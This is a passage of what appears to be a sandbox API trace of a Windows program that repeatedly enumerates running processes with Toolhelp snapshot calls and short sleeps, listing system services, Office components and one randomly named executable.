cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.371] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.372] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.372] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.372] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.373] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.373] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.373] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.373] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.374] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.374] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.374] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.374] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.375] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.375] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.375] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.376] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.376] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.376] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.376] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.377] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.377] Process32NextW (in: hSnapshot=0x1c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.377] Sleep (dwMilliseconds=0x64) [0218.478] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cc [0218.480] Process32FirstW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.480] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.481] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.481] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.481] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.481] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.482] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.482] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.482] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.482] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.483] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.483] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.483] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.484] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.484] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.484] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.484] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.485] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.485] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.485] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.486] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.486] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.486] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.486] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.487] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.487] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.487] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.487] Process32NextW (in: hSnapshot=0x1cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.488] Sleep (dwMilliseconds=0x64) [0218.619] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d0 [0218.621] Process32FirstW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.621] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.622] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.622] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.622] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.623] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.623] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.623] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.623] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.624] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.624] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.624] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.625] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.625] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.625] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.625] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.626] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.626] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.626] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0218.627] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.627] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.627] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.627] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.628] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.628] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0218.628] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0218.628] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.629] Process32NextW (in: hSnapshot=0x1d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0218.629] Sleep (dwMilliseconds=0x64) [0218.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d4 [0218.736] Process32FirstW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.736] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.737] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.737] Process32NextW (in: hSnapshot=0x1d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, 